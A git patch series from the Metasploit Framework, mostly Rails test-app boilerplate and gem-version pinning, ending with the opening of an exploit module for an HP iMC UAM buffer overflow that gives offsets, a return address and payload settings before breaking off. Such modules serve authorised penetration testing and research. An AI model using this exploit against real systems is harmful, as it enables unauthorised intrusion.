+//= require_tree . diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/stylesheets/application.css b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/stylesheets/application.css new file mode 100644 index 0000000000..3192ec897b --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/assets/stylesheets/application.css 
@@ -0,0 +1,13 @@ +/* + * This is a manifest file that'll be compiled into application.css, which will include all the files + * listed below. + * + * Any CSS and SCSS file within this directory, lib/assets/stylesheets, vendor/assets/stylesheets, + * or vendor/assets/stylesheets of plugins, if any, can be referenced here using a relative path. + * + * You're free to add application-wide styles to this file and they'll appear at the top of the + * compiled file, but it's generally better to create a new file per style scope. + * + *= require_self + *= require_tree . + */ diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/controllers/application_controller.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/controllers/application_controller.rb new file mode 100644 index 0000000000..e8065d9505 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/controllers/application_controller.rb @@ -0,0 +1,3 @@ +class ApplicationController < ActionController::Base + protect_from_forgery +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/helpers/application_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/helpers/application_helper.rb new file mode 100644 index 0000000000..de6be7945c --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/helpers/application_helper.rb @@ -0,0 +1,2 @@ +module ApplicationHelper +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/mailers/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/mailers/.gitkeep new file mode 100644 index 0000000000..e69de29bb2 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/models/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/models/.gitkeep new file mode 100644 index 0000000000..e69de29bb2 diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/views/layouts/application.html.erb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/views/layouts/application.html.erb new file mode 100644 index 0000000000..4cab268465 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/app/views/layouts/application.html.erb @@ -0,0 +1,14 @@ + + + + Dummy + <%= stylesheet_link_tag "application", :media => "all" %> + <%= javascript_include_tag "application" %> + <%= csrf_meta_tags %> + + + +<%= yield %> + + + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config.ru b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config.ru new file mode 100644 index 0000000000..1989ed8d0c --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config.ru @@ -0,0 +1,4 @@ +# This file is used by Rack-based servers to start the application. + +require ::File.expand_path('../config/environment', __FILE__) +run Dummy::Application diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/application.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/application.rb new file mode 100644 index 0000000000..52720f259a --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/application.rb 
@@ -0,0 +1,61 @@
+require File.expand_path('../boot', __FILE__)
+
+require 'rails/all'
+
+Bundler.require
+# require the engine being tested. In a non-dummy app this would be handled by the engine's gem being in the Gemfile
+# for real app and Bundler.require requiring the gem.
+require 'metasploit_data_models'
+
+module Dummy
+ class Application < Rails::Application
+ # Settings in config/environments/* take precedence over those specified here.
+ # Application configuration should go into files in config/initializers
+ # -- all .rb files in that directory are automatically loaded.
+
+ # Custom directories with classes and modules you want to be autoloadable.
+ # config.autoload_paths += %W(#{config.root}/extras)
+
+ # Only load the plugins named here, in the order given (default is alphabetical).
+ # :all can be used as a placeholder for all plugins not explicitly named.
+ # config.plugins = [ :exception_notification, :ssl_requirement, :all ]
+
+ # Activate observers that should always be running.
+ # config.active_record.observers = :cacher, :garbage_collector, :forum_observer
+
+ # Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
+ # Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
+ # config.time_zone = 'Central Time (US & Canada)'
+
+ # The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
+ # config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
+ # config.i18n.default_locale = :de
+
+ # Configure the default encoding used in templates for Ruby 1.9.
+ config.encoding = "utf-8"
+
+ # Configure sensitive parameters which will be filtered from the log file.
+ config.filter_parameters += [:password]
+
+ # Enable escaping HTML in JSON.
+ config.active_support.escape_html_entities_in_json = true
+
+ # Use SQL instead of Active Record's schema dumper when creating the database.
+ # This is necessary if your schema can't be completely dumped by the schema dumper,
+ # like if you have constraints or database-specific column types
+ # config.active_record.schema_format = :sql
+
+ # Enforce whitelist mode for mass assignment.
+ # This will create an empty whitelist of attributes available for mass-assignment for all models
+ # in your app. As such, your models will need to explicitly whitelist or blacklist accessible
+ # parameters by using an attr_accessible or attr_protected declaration.
+ config.active_record.whitelist_attributes = true
+
+ # Enable the asset pipeline
+ config.assets.enabled = true
+
+ # Version of your assets, change this if you want to expire all your assets
+ config.assets.version = '1.0'
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/boot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/boot.rb
new file mode 100644
index 0000000000..eba0681370
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/boot.rb
@@ -0,0 +1,10 @@
+require 'rubygems'
+gemfile = File.expand_path('../../../../Gemfile', __FILE__)
+
+if File.exist?(gemfile)
+ ENV['BUNDLE_GEMFILE'] = gemfile
+ require 'bundler'
+ Bundler.setup
+end
+
+$:.unshift File.expand_path('../../../../lib', __FILE__)
\ No newline at end of file
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/database.yml.example b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/database.yml.example
new file mode 100644
index 0000000000..d0b42964c0
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/database.yml.example
@@ -0,0 +1,22 @@ +# Please only use postgresql bound to a TCP port. +development: &pgsql + adapter: postgresql + database: metasploit_data_models_development + username: metasploit_data_models_development + password: __________________________________ + host: localhost + port: 5432 + pool: 5 + timeout: 5 + +# Warning: The database defined as "test" will be erased and +# re-generated from your development database when you run "rake". +# Do not set this db to the same as development or production. +# +# Note also, sqlite3 is totally unsupported by Metasploit now. +test: + <<: *pgsql + database: metasploit_data_models_test + username: metasploit_data_models_test + password: ___________________________ + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environment.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environment.rb new file mode 100644 index 0000000000..3da5eb91d0 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environment.rb @@ -0,0 +1,5 @@ +# Load the rails application +require File.expand_path('../application', __FILE__) + +# Initialize the rails application +Dummy::Application.initialize! diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/development.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/development.rb new file mode 100644 index 0000000000..82c74d1541 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/development.rb 
@@ -0,0 +1,37 @@
+Dummy::Application.configure do
+ # Settings specified here will take precedence over those in config/application.rb
+
+ # In the development environment your application's code is reloaded on
+ # every request. This slows down response time but is perfect for development
+ # since you don't have to restart the web server when you make code changes.
+ config.cache_classes = false
+
+ # Log error messages when you accidentally call methods on nil.
+ config.whiny_nils = true
+
+ # Show full error reports and disable caching
+ config.consider_all_requests_local = true
+ config.action_controller.perform_caching = false
+
+ # Don't care if the mailer can't send
+ config.action_mailer.raise_delivery_errors = false
+
+ # Print deprecation notices to the Rails logger
+ config.active_support.deprecation = :log
+
+ # Only use best-standards-support built into browsers
+ config.action_dispatch.best_standards_support = :builtin
+
+ # Raise exception on mass assignment protection for Active Record models
+ config.active_record.mass_assignment_sanitizer = :strict
+
+ # Log the query plan for queries taking more than this (works
+ # with SQLite, MySQL, and PostgreSQL)
+ config.active_record.auto_explain_threshold_in_seconds = 0.5
+
+ # Do not compress assets
+ config.assets.compress = false
+
+ # Expands the lines which load the assets
+ config.assets.debug = true
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/production.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/production.rb
new file mode 100644
index 0000000000..bdac56a713
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/production.rb
@@ -0,0 +1,67 @@
+Dummy::Application.configure do
+ # Settings specified here will take precedence over those in config/application.rb
+
+ # Code is not reloaded between requests
+ config.cache_classes = true
+
+ # Full error reports are disabled and caching is turned on
+ config.consider_all_requests_local = false
+ config.action_controller.perform_caching = true
+
+ # Disable Rails's static asset server (Apache or nginx will already do this)
+ config.serve_static_assets = false
+
+ # Compress JavaScripts and CSS
+ config.assets.compress = true
+
+ # Don't fallback to assets pipeline if a precompiled asset is missed
+ config.assets.compile = false
+
+ # Generate digests for assets URLs
+ config.assets.digest = true
+
+ # Defaults to nil and saved in location specified by config.assets.prefix
+ # config.assets.manifest = YOUR_PATH
+
+ # Specifies the header that your server uses for sending files
+ # config.action_dispatch.x_sendfile_header = "X-Sendfile" # for apache
+ # config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for nginx
+
+ # Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
+ # config.force_ssl = true
+
+ # See everything in the log (default is :info)
+ # config.log_level = :debug
+
+ # Prepend all log lines with the following tags
+ # config.log_tags = [ :subdomain, :uuid ]
+
+ # Use a different logger for distributed setups
+ # config.logger = ActiveSupport::TaggedLogging.new(SyslogLogger.new)
+
+ # Use a different cache store in production
+ # config.cache_store = :mem_cache_store
+
+ # Enable serving of images, stylesheets, and JavaScripts from an asset server
+ # config.action_controller.asset_host = "http://assets.example.com"
+
+ # Precompile additional assets (application.js, application.css, and all non-JS/CSS are already added)
+ # config.assets.precompile += %w( search.js )
+
+ # Disable delivery errors, bad email addresses will be ignored
+ # config.action_mailer.raise_delivery_errors = false
+
+ # Enable threaded mode
+ # config.threadsafe!
+
+ # Enable locale fallbacks for I18n (makes lookups for any locale fall back to
+ # the I18n.default_locale when a translation can not be found)
+ config.i18n.fallbacks = true
+
+ # Send deprecation notices to registered listeners
+ config.active_support.deprecation = :notify
+
+ # Log the query plan for queries taking more than this (works
+ # with SQLite, MySQL, and PostgreSQL)
+ # config.active_record.auto_explain_threshold_in_seconds = 0.5
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/test.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/test.rb
new file mode 100644
index 0000000000..f1a4814175
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/environments/test.rb
@@ -0,0 +1,37 @@
+Dummy::Application.configure do
+ # Settings specified here will take precedence over those in config/application.rb
+
+ # The test environment is used exclusively to run your application's
+ # test suite. You never need to work with it otherwise. Remember that
+ # your test database is "scratch space" for the test suite and is wiped
+ # and recreated between test runs. Don't rely on the data there!
+ config.cache_classes = true
+
+ # Configure static asset server for tests with Cache-Control for performance
+ config.serve_static_assets = true
+ config.static_cache_control = "public, max-age=3600"
+
+ # Log error messages when you accidentally call methods on nil
+ config.whiny_nils = true
+
+ # Show full error reports and disable caching
+ config.consider_all_requests_local = true
+ config.action_controller.perform_caching = false
+
+ # Raise exceptions instead of rendering exception templates
+ config.action_dispatch.show_exceptions = false
+
+ # Disable request forgery protection in test environment
+ config.action_controller.allow_forgery_protection = false
+
+ # Tell Action Mailer not to deliver emails to the real world.
+ # The :test delivery method accumulates sent emails in the
+ # ActionMailer::Base.deliveries array.
+ config.action_mailer.delivery_method = :test
+
+ # Raise exception on mass assignment protection for Active Record models
+ config.active_record.mass_assignment_sanitizer = :strict
+
+ # Print deprecation notices to the stderr
+ config.active_support.deprecation = :stderr
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/backtrace_silencers.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/backtrace_silencers.rb
new file mode 100644
index 0000000000..59385cdf37
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/backtrace_silencers.rb
@@ -0,0 +1,7 @@
+# Be sure to restart your server when you modify this file.
+
+# You can add backtrace silencers for libraries that you're using but don't wish to see in your backtraces.
+# Rails.backtrace_cleaner.add_silencer { |line| line =~ /my_noisy_library/ }
+
+# You can also remove all the silencers if you're trying to debug a problem that might stem from framework code.
+# Rails.backtrace_cleaner.remove_silencers!
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/inflections.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/inflections.rb
new file mode 100644
index 0000000000..5d8d9be237
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/inflections.rb
@@ -0,0 +1,15 @@
+# Be sure to restart your server when you modify this file.
+
+# Add new inflection rules using the following format
+# (all these examples are active by default):
+# ActiveSupport::Inflector.inflections do |inflect|
+# inflect.plural /^(ox)$/i, '\1en'
+# inflect.singular /^(ox)en/i, '\1'
+# inflect.irregular 'person', 'people'
+# inflect.uncountable %w( fish sheep )
+# end
+#
+# These inflection rules are supported but not enabled by default:
+# ActiveSupport::Inflector.inflections do |inflect|
+# inflect.acronym 'RESTful'
+# end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/mime_types.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/mime_types.rb
new file mode 100644
index 0000000000..72aca7e441
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/mime_types.rb
@@ -0,0 +1,5 @@
+# Be sure to restart your server when you modify this file.
+
+# Add new mime types for use in respond_to blocks:
+# Mime::Type.register "text/richtext", :rtf
+# Mime::Type.register_alias "text/html", :iphone
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/secret_token.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/secret_token.rb
new file mode 100644
index 0000000000..ef7d7a05a3
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/secret_token.rb
@@ -0,0 +1,7 @@
+# Be sure to restart your server when you modify this file.
+
+# Your secret key for verifying the integrity of signed cookies.
+# If you change this key, all old signed cookies will become invalid!
+# Make sure the secret is at least 30 characters and all random,
+# no regular words or you'll be exposed to dictionary attacks.
+Dummy::Application.config.secret_token = 'f04f565f9a4db0f0af88f4bd8b79952d139b02434b889a7c7bb3fe83405e9032409bd16bca7b0d7d68a8b119b6ddfd31b17d19155cd699a27e19a48bd05eb200'
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/session_store.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/session_store.rb
new file mode 100644
index 0000000000..952473ff9a
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/session_store.rb
@@ -0,0 +1,8 @@
+# Be sure to restart your server when you modify this file.
+
+Dummy::Application.config.session_store :cookie_store, key: '_dummy_session'
+
+# Use the database for sessions instead of the cookie-based default,
+# which shouldn't be used to store highly confidential information
+# (create the session table with "rails generate session_migration")
+# Dummy::Application.config.session_store :active_record_store
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/wrap_parameters.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/wrap_parameters.rb
new file mode 100644
index 0000000000..999df20181
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/initializers/wrap_parameters.rb
@@ -0,0 +1,14 @@
+# Be sure to restart your server when you modify this file.
+#
+# This file contains settings for ActionController::ParamsWrapper which
+# is enabled by default.
+
+# Enable parameter wrapping for JSON. You can disable this by setting :format to an empty array.
+ActiveSupport.on_load(:action_controller) do
+ wrap_parameters format: [:json]
+end
+
+# Disable root element in JSON by default.
+ActiveSupport.on_load(:active_record) do
+ self.include_root_in_json = false
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/routes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/routes.rb
new file mode 100644
index 0000000000..1daf9a4121
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/config/routes.rb
@@ -0,0 +1,2 @@
+Rails.application.routes.draw do
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/lib/assets/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/lib/assets/.gitkeep
new file mode 100644
index 0000000000..e69de29bb2
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/log/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/log/.gitkeep
new file mode 100644
index 0000000000..e69de29bb2
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/404.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/404.html new file mode 100644 index 0000000000..9a48320a5f --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/404.html @@ -0,0 +1,26 @@ + + + + The page you were looking for doesn't exist (404) + + + + + +

+

The page you were looking for doesn't exist.

+

You may have mistyped the address or the page may have moved.

+
+ + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/422.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/422.html new file mode 100644 index 0000000000..83660ab187 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/422.html @@ -0,0 +1,26 @@ + + + + The change you wanted was rejected (422) + + + + + +
+

The change you wanted was rejected.

+

Maybe you tried to change something you didn't have access to.

+
+ + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/500.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/500.html new file mode 100644 index 0000000000..f3648a0dbc --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/500.html @@ -0,0 +1,25 @@ + + + + We're sorry, but something went wrong (500) + + + + + +
+

We're sorry, but something went wrong.

+
+ + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/favicon.ico b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/public/favicon.ico new file mode 100644 index 0000000000..e69de29bb2 diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/script/rails new file mode 100755 index 0000000000..f8da2cffd4 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/dummy/script/rails @@ -0,0 +1,6 @@ +#!/usr/bin/env ruby +# This command will automatically be run when you run "rails" with Rails 3 gems installed from the root of your application. + +APP_PATH = File.expand_path('../../config/application', __FILE__) +require File.expand_path('../../config/boot', __FILE__) +require 'rails/commands' diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/spec_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/spec_helper.rb index b25a475b78..66d1de6804 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/spec_helper.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/spec/spec_helper.rb 
@@ -1 +1,24 @@ -require File.expand_path(File.dirname(__FILE__) + "/../lib/msf_models") +# Configure Rails Environment +ENV['RAILS_ENV'] = 'test' + +require File.expand_path('../dummy/config/environment.rb', __FILE__) + +require 'rubygems' +require 'bundler' +Bundler.setup(:default, :test) +Bundler.require(:default, :test) + +# full backtrace in logs so its easier to trace errors +Rails.backtrace_cleaner.remove_silencers! + +# Requires supporting ruby files with custom matchers and macros, etc, +# in spec/support/ and its subdirectories. +support_glob = MetasploitDataModels.root.join('spec', 'support', '**', '*.rb') + +Dir.glob(support_glob) do |path| + require path +end + +RSpec.configure do |config| + config.mock_with :rspec +end diff --git a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec index a6525c2224..7b728268c3 100644 --- a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec +++ b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec @@ -2,11 +2,11 @@ Gem::Specification.new do |s| s.name = "metasploit_data_models" - s.version = "0.0.2.43DEV" + s.version = "0.3.0" - s.required_rubygems_version = Gem::Requirement.new("> 1.3.1") if s.respond_to? :required_rubygems_version= + s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version= s.authors = ["Trevor Rosen"] - s.date = "2012-08-16" + s.date = "2012-11-01" s.description = "Implements minimal ActiveRecord models and database helper code used in both the Metasploit Framework (MSF) and Metasploit commercial editions." s.email = ["trevor_rosen@rapid7.com"] s.executables = ["mdm_console"] 
@@ -20,20 +20,20 @@ Gem::Specification.new do |s| s.specification_version = 3 if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then - s.add_development_dependency(%q, [">= 0"]) + s.add_development_dependency(%q, [">= 0"]) s.add_runtime_dependency(%q, [">= 0"]) s.add_runtime_dependency(%q, [">= 0"]) s.add_runtime_dependency(%q, [">= 0"]) s.add_runtime_dependency(%q, [">= 0"]) else - s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) end else - s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index 0f68a03c21..b38e60231f 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -120,7 +120,7 @@ class DBManager # are already in the object space begin unless defined? Mdm::Host - self.class.send :include, MetasploitDataModels + MetasploitDataModels.require_models end rescue NameError => e warn_about_rubies From 76c3decffb075f0a30c6928a46b0229c57b695f1 Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Thu, 1 Nov 2012 08:57:57 -0500 Subject: [PATCH 51/64] Update Gemfile(.lock) to use tag 0.3.0 for metasploit_data_models Ensures that Gemfile uses same version as in gemcache. --- Gemfile | 2 +- Gemfile.lock | 7 ++++--- 2 files changed, 5 insertions(+), 4 deletions(-) diff --git a/Gemfile b/Gemfile index 01703f0b04..825f532450 100755 --- a/Gemfile +++ b/Gemfile 
@@ -5,7 +5,7 @@ gem 'activesupport', '>= 3.0.0' # Needed for Msf::DbManager gem 'activerecord' # Database models shared between framework and Pro. -gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git' +gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.3.0' # Needed for module caching in Mdm::ModuleDetails gem 'pg', '>= 0.11' diff --git a/Gemfile.lock b/Gemfile.lock index a666ef8540..10894e9139 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,8 +1,9 @@ GIT remote: git://github.com/rapid7/metasploit_data_models.git - revision: dd6c3a31c5ad8b55f4913b5ba20307178ba9c7bf + revision: 73f26789500f278dd6fd555e839d09a3b81a05f4 + tag: 0.3.0 specs: - metasploit_data_models (0.0.2) + metasploit_data_models (0.3.0) activerecord activesupport pg @@ -27,7 +28,7 @@ GEM coderay (1.0.8) diff-lcs (1.1.3) i18n (0.6.1) - method_source (0.8) + method_source (0.8.1) multi_json (1.3.6) pg (0.14.1) pry (0.9.10) From e7207697473731a285d142ec9b1690eafb742d1f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 Nov 2012 17:17:45 +0100 Subject: [PATCH 52/64] Added module for ZDI-12-171 --- modules/exploits/windows/misc/hp_imc_uam.rb | 128 ++++++++++++++++++++ 1 file changed, 128 insertions(+) create mode 100644 modules/exploits/windows/misc/hp_imc_uam.rb diff --git a/modules/exploits/windows/misc/hp_imc_uam.rb b/modules/exploits/windows/misc/hp_imc_uam.rb new file mode 100644 index 0000000000..07c7b60a9e --- /dev/null +++ b/modules/exploits/windows/misc/hp_imc_uam.rb 
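Review bot: The `metasploit_data_models` line in the Gemfile hunk still fetches the dependency over `git://`, a transport with no encryption or server authentication, so anyone on the network path can substitute the repository contents. Adding `:tag => '0.3.0'` does not help with that, because a tag is a movable name; only the `revision:` recorded in Gemfile.lock fixes the content, and only for installs that honour the lock. I would switch the source to HTTPS while touching this line: `gem 'metasploit_data_models', :git => 'https://github.com/rapid7/metasploit_data_models.git', :tag => '0.3.0'`, and update the `remote:` entry in Gemfile.lock to match.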
@@ -0,0 +1,128 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HP Intelligent Management Center UAM Buffer Overflow', + 'Description' => %q{ + This module exploits a remote buffer overflow in HP Intelligent Management Center + UAM. The vulnerability exists in the uam.exe component, when using sprint in a + insecure way for logging purposes. The vulnerability can be triggered by sending a + malformed packet to the 1811/UDP port. The module has been successfully tested on + HP iMC 5.0 E0101 and UAM 5.0 E0102 over Windows Server 2003 SP2 (DEP bypass). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'e6af8de8b1d4b2b6d5ba2610cbf9cd38', # Vulnerability discovery + 'sinn3r', # Metasploit module + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + ['OSVDB', '85060'], + ['BID', '55271'], + ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-171'] + ], + 'Payload' => + { + 'BadChars' => "\x00\x0d\x0a", + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment # add esp, -3500 + 'Space' => 3925, + 'DisableNops' => true + }, + 'Platform' => ['win'], + 'Targets' => + [ + [ 'HP iMC 5.0 E0101 / UAM 5.0 E0102 on Windows 2003 SP2', + { + 'Offset' => 4035, + 'Ret' => 0x0045403a # ADD ESP,664; RETN 04 streamprocess.exe + } + ] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Aug 29 2012', + 'DefaultTarget' => 0)) + + register_options([Opt::RPORT(1811)], self.class) + end + + def junk(n=4) + return rand_text_alpha(n).unpack("V")[0].to_i + end + + def nop + return make_nops(4).unpack("V")[0].to_i + end + + def send_echo_reply(operator) + packet = 
